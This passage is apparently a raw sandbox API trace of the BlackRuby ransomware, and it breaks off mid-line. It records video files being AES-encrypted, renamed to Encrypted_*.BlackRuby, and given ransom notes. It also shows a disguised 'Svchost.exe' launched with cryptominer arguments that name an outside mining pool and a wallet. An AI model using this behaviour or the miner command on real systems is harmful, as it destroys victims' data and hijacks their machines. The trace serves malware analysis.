(uMode=0x1) returned 0x0 [0063.535] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\mosmxe.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c3a240, ftCreationTime.dwHighDateTime=0x1d35325, ftLastAccessTime.dwLowDateTime=0x22c20e30, ftLastAccessTime.dwHighDateTime=0x1d34a6d, ftLastWriteTime.dwLowDateTime=0x22c20e30, ftLastWriteTime.dwHighDateTime=0x1d34a6d, nFileSizeHigh=0x0, nFileSizeLow=0x325e)) returned 1 [0063.535] GetLastError () returned 0x0 [0063.535] SetErrorMode (uMode=0x0) returned 0x1 [0063.535] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c680) returned 1 [0063.536] GetLastError () returned 0x0 [0063.567] CryptImportKey (in: hProv=0x37c680, pbData=0x1c8c2e8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360d20) returned 1 [0063.567] GetLastError () returned 0x0 [0063.567] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.567] GetLastError () returned 0x0 [0063.572] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.572] GetLastError () returned 0x0 [0063.572] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360a20) returned 1 [0063.572] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.572] GetLastError () returned 0x0 [0063.572] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1cb9334*=0x1, dwFlags=0x0) returned 1 [0063.572] GetLastError () returned 0x0 [0063.572] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1cb9300, dwFlags=0x0) returned 1 [0063.572] GetLastError () returned 0x0 [0063.572] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb937c*, pdwDataLen=0x18ec9c*=0x3350, dwBufLen=0x3350 | out: pbData=0x1cb937c*, pdwDataLen=0x18ec9c*=0x3350) returned 1 [0063.572] GetLastError () returned 0x0 [0063.572] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cbfa48*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1cbfa48*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0063.572] GetLastError () returned 0x0 [0063.572] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cbfa78*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1cbfa78*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0063.572] GetLastError () returned 0x0 [0063.572] CryptDestroyKey (hKey=0x360d20) returned 1 [0063.572] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.573] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", lpFilePart=0x0) returned 0x46 [0063.573] GetLastError () returned 0x0 [0063.573] SetErrorMode (uMode=0x1) returned 0x0 [0063.573] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\mosmxe.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.574] GetLastError () returned 0xb7 [0063.574] GetFileType (hFile=0x258) returned 0x1 [0063.574] SetErrorMode (uMode=0x0) returned 0x1 [0063.574] GetFileType (hFile=0x258) returned 0x1 [0063.575] CloseHandle (hObject=0x258) returned 1 [0063.575] GetLastError () returned 0xb7 [0063.575] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", lpFilePart=0x0) returned 0x46 [0063.575] GetLastError () returned 0xb7 [0063.575] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\Encrypted_0PpaIsWQUTRl2Pf5kfGxnLnL8YCAk5sHNMS9d.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\Encrypted_0PpaIsWQUTRl2Pf5kfGxnLnL8YCAk5sHNMS9d.BlackRuby", lpFilePart=0x0) returned 0x75 [0063.575] GetLastError () returned 0xb7 [0063.575] SetErrorMode (uMode=0x1) returned 0x0 [0063.575] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\mosmxe.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c3a240, ftCreationTime.dwHighDateTime=0x1d35325, ftLastAccessTime.dwLowDateTime=0x22c20e30, ftLastAccessTime.dwHighDateTime=0x1d34a6d, ftLastWriteTime.dwLowDateTime=0x2e173480, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x3360)) returned 1 [0063.575] GetLastError () returned 0xb7 [0063.575] SetErrorMode (uMode=0x0) returned 0x1 [0063.576] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\mosmxe.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\Encrypted_0PpaIsWQUTRl2Pf5kfGxnLnL8YCAk5sHNMS9d.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\encrypted_0ppaiswqutrl2pf5kfgxnlnl8ycak5shnms9d.blackruby")) returned 1 [0063.579] GetLastError () returned 0xb7 [0063.579] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x54 [0063.579] GetLastError () returned 0xb7 [0063.579] SetErrorMode (uMode=0x1) returned 0x0 [0063.579] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.580] GetLastError () returned 0x0 [0063.580] GetFileType (hFile=0x258) returned 0x1 [0063.580] SetErrorMode (uMode=0x0) returned 0x1 [0063.580] GetFileType (hFile=0x258) returned 0x1 [0063.581] CloseHandle (hObject=0x258) returned 1 [0063.581] GetLastError () returned 0x0 [0063.581] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x54 [0063.581] GetLastError () returned 0x0 [0063.581] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0063.582] GetLastError () returned 0x0 [0063.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", lpFilePart=0x0) returned 0x53 [0063.582] GetLastError () returned 0x0 [0063.582] SetErrorMode (uMode=0x1) returned 0x0 [0063.582] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\uxgj9iamwup3b81rdr5.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1ce643c | out: lpFileInformation=0x1ce643c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a8a7480, ftCreationTime.dwHighDateTime=0x1d355fa, ftLastAccessTime.dwLowDateTime=0x4f538ee0, ftLastAccessTime.dwHighDateTime=0x1d353f7, ftLastWriteTime.dwLowDateTime=0x4f538ee0, ftLastWriteTime.dwHighDateTime=0x1d353f7, nFileSizeHigh=0x0, nFileSizeLow=0x11eef)) returned 1 [0063.582] GetLastError () returned 0x0 [0063.582] SetErrorMode (uMode=0x0) returned 0x1 [0063.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", lpFilePart=0x0) returned 0x53 [0063.582] GetLastError () returned 0x0 [0063.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", lpFilePart=0x0) returned 0x53 [0063.582] GetLastError () returned 0x0 [0063.582] SetErrorMode (uMode=0x1) returned 0x0 [0063.582] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\uxgj9iamwup3b81rdr5.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.582] GetLastError () returned 0x0 [0063.582] GetFileType (hFile=0x258) returned 0x1 [0063.582] SetErrorMode (uMode=0x0) returned 0x1 [0063.582] GetFileType (hFile=0x258) returned 0x1 [0063.582] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x11eef [0063.582] GetLastError () returned 0x0 [0063.582] ReadFile (in: hFile=0x258, lpBuffer=0x1ce83c4, nNumberOfBytesToRead=0x11eef, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1ce83c4*, lpNumberOfBytesRead=0x18ecac*=0x11eef, lpOverlapped=0x0) returned 1 [0063.583] GetLastError () returned 0x0 [0063.583] CloseHandle (hObject=0x258) returned 1 [0063.583] GetLastError () returned 0x0 [0063.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", lpFilePart=0x0) returned 0x53 [0063.583] GetLastError () returned 0x0 [0063.583] SetErrorMode (uMode=0x1) returned 0x0 [0063.583] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\uxgj9iamwup3b81rdr5.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a8a7480, ftCreationTime.dwHighDateTime=0x1d355fa, ftLastAccessTime.dwLowDateTime=0x4f538ee0, ftLastAccessTime.dwHighDateTime=0x1d353f7, ftLastWriteTime.dwLowDateTime=0x4f538ee0, ftLastWriteTime.dwHighDateTime=0x1d353f7, nFileSizeHigh=0x0, nFileSizeLow=0x11eef)) returned 1 [0063.584] GetLastError () returned 0x0 [0063.584] SetErrorMode (uMode=0x0) returned 0x1 [0063.604] CryptImportKey (in: hProv=0x37c818, pbData=0x1b68698, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360e20) returned 1 [0063.604] GetLastError () returned 0x0 [0063.604] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.604] GetLastError () returned 0x0 [0063.631] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.631] GetLastError () returned 0x0 [0063.631] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ee0) returned 1 [0063.631] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.631] GetLastError () returned 0x0 [0063.631] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1b956e4*=0x1, dwFlags=0x0) returned 1 [0063.631] GetLastError () returned 0x0 [0063.631] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1b956b0, dwFlags=0x0) returned 1 [0063.631] GetLastError () returned 0x0 [0063.631] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9572c*, pdwDataLen=0x18ec9c*=0x11fe0, dwBufLen=0x11fe0 | out: pbData=0x1b9572c*, pdwDataLen=0x18ec9c*=0x11fe0) returned 1 [0063.632] GetLastError () returned 0x0 [0063.632] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb9718*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1bb9718*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0063.632] GetLastError () returned 0x0 [0063.632] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb9748*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1bb9748*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0063.632] GetLastError () returned 0x0 [0063.633] CryptDestroyKey (hKey=0x360e20) returned 1 [0063.633] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.633] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.633] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", lpFilePart=0x0) returned 0x53 [0063.633] GetLastError () returned 0x0 [0063.633] SetErrorMode (uMode=0x1) returned 0x0 [0063.633] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\uxgj9iamwup3b81rdr5.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.634] GetLastError () returned 0xb7 [0063.634] GetFileType (hFile=0x258) returned 0x1 [0063.635] SetErrorMode (uMode=0x0) returned 0x1 [0063.635] GetFileType (hFile=0x258) returned 0x1 [0063.637] CloseHandle (hObject=0x258) returned 1 [0063.637] GetLastError () returned 0xb7 [0063.637] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv", lpFilePart=0x0) returned 0x53 [0063.637] GetLastError () returned 0xb7 [0063.637] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\Encrypted_wFroNv7Fo695TI2ptwTCKIDxLyK0bQGBYmU4fRNe4EMV.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\Encrypted_wFroNv7Fo695TI2ptwTCKIDxLyK0bQGBYmU4fRNe4EMV.BlackRuby", lpFilePart=0x0) returned 0x7c [0063.637] GetLastError () returned 0xb7 [0063.637] SetErrorMode (uMode=0x1) returned 0x0 [0063.637] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\uxgj9iamwup3b81rdr5.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a8a7480, ftCreationTime.dwHighDateTime=0x1d355fa, ftLastAccessTime.dwLowDateTime=0x4f538ee0, ftLastAccessTime.dwHighDateTime=0x1d353f7, ftLastWriteTime.dwLowDateTime=0x2e20ba00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11ff0)) returned 1 [0063.637] GetLastError () returned 0xb7 [0063.637] SetErrorMode (uMode=0x0) returned 0x1 [0063.637] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\uXgJ9iamwUp3B81Rdr5.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\uxgj9iamwup3b81rdr5.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\Encrypted_wFroNv7Fo695TI2ptwTCKIDxLyK0bQGBYmU4fRNe4EMV.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\encrypted_wfronv7fo695ti2ptwtckidxlyk0bqgbymu4frne4emv.blackruby")) returned 1 [0063.638] GetLastError () returned 0xb7 [0063.638] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x54 [0063.638] GetLastError () returned 0xb7 [0063.638] SetErrorMode (uMode=0x1) returned 0x0 [0063.638] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0063.638] GetLastError () returned 0x5 [0063.639] SetErrorMode (uMode=0x0) returned 0x1 [0063.639] GetFullPathNameW (in: lpFileName="C:\\Users\\Public", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public", lpFilePart=0x0) returned 0xf [0063.639] GetLastError () returned 0x5 [0063.639] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0063.639] GetLastError () returned 0x5 [0063.640] GetLogicalDrives () returned 0x4 [0063.640] GetLastError () returned 0x5 [0063.640] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18eabc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0063.640] GetLastError () returned 0x5 [0063.640] SetErrorMode (uMode=0x1) returned 0x0 [0063.640] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18efdc | out: lpFileInformation=0x18efdc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x22f123e0, ftLastAccessTime.dwHighDateTime=0x1d39df7, ftLastWriteTime.dwLowDateTime=0x22f123e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0063.640] GetLastError () returned 0x5 [0063.640] SetErrorMode (uMode=0x0) returned 0x1 [0063.640] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.640] GetLastError () returned 0x5 [0063.706] GetUserNameW (in: lpBuffer=0x364560, pcbBuffer=0x18f004 | out: lpBuffer="EEBsYm5", pcbBuffer=0x18f004) returned 1 [0063.706] GetComputerNameW (in: lpBuffer=0x364560, nSize=0x18f004 | out: lpBuffer="CRH2YWU7", nSize=0x18f004) returned 1 [0063.739] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x39ab48 [0063.739] RtlMoveMemory (in: Destination=0x39ab48, Source=0x1be9678, Length=0x18 | out: Destination=0x39ab48) [0063.739] LocalAlloc (uFlags=0x0, uBytes=0x142) returned 0x37a8f0 [0063.739] RtlMoveMemory (in: Destination=0x37a8f0, Source=0x1be9e2c, Length=0x142 | out: Destination=0x37a8f0) [0063.739] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x334180 [0063.739] RtlMoveMemory (in: Destination=0x334180, Source=0x1b04e40, Length=0x3c | out: Destination=0x334180) [0063.746] ShellExecuteExW (in: pExecInfo=0x1be9f78*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="Svchost.exe", lpParameters="-o stratum+tcp://de01.supportxmr.com:3333 -u 43DmqxU4LzuTrmA8GLZ7S5J6w32bwCavX9bhvCiSEwwebfn4TCYRAxmPtWTZq9iQ1F6XYsktJEYBYDkhKu4KXw6rCCspxCJ -p EEBsYm5:CRH2YWU7", lpDirectory="C:\\Windows\\system32\\BlackRuby", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x1be9f78*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="Svchost.exe", lpParameters="-o stratum+tcp://de01.supportxmr.com:3333 -u 43DmqxU4LzuTrmA8GLZ7S5J6w32bwCavX9bhvCiSEwwebfn4TCYRAxmPtWTZq9iQ1F6XYsktJEYBYDkhKu4KXw6rCCspxCJ -p EEBsYm5:CRH2YWU7", lpDirectory="C:\\Windows\\system32\\BlackRuby", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x450)) returned 1 [0065.981] GetLastError () returned 0x0 [0065.981] LocalFree (hMem=0x39ab48) returned 0x0 [0065.981] GetLastError () returned 0x0 [0065.981] LocalFree (hMem=0x37a8f0) returned 0x0 [0065.981] GetLastError () returned 0x0 [0065.981] LocalFree (hMem=0x334180) returned 0x0 [0065.981] GetLastError () returned 0x0 [0065.982] GetCurrentProcess () returned 0xffffffff [0065.982] GetLastError () returned 0x0 [0065.982] GetCurrentProcess () returned 0xffffffff [0065.982] GetLastError () returned 0x0 [0065.983] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x450, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x18ef50, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18ef50*=0x404) returned 1 [0065.983] GetLastError () returned 0x0 [0065.983] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x7fffffff, cHandles=0x1, pHandles=0x18ef78*=0x404, lpdwindex=0x18ed30 | out: lpdwindex=0x18ed30) returned 0x0 [0066.424] CloseHandle (hObject=0x404) returned 1 [0066.424] GetLastError () returned 0x0 [0066.424] CloseHandle (hObject=0x450) returned 1 [0066.424] GetLastError () returned 0x0 [0066.424] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x3d99a0 [0066.424] RtlMoveMemory (in: Destination=0x3d99a0, Source=0x1be9678, Length=0x18 | out: Destination=0x3d99a0) [0066.424] LocalAlloc (uFlags=0x0, uBytes=0x142) returned 0x37a8f0 [0066.424] RtlMoveMemory (in: Destination=0x37a8f0, Source=0x1be9e2c, Length=0x142 | out: Destination=0x37a8f0) [0066.424] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3a2578 [0066.424] RtlMoveMemory (in: Destination=0x3a2578, Source=0x1b04e40, Length=0x3c | out: Destination=0x3a2578) [0066.425] ShellExecuteExW (in: pExecInfo=0x1bea010*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="Svchost.exe", lpParameters="-o stratum+tcp://de01.supportxmr.com:3333 -u 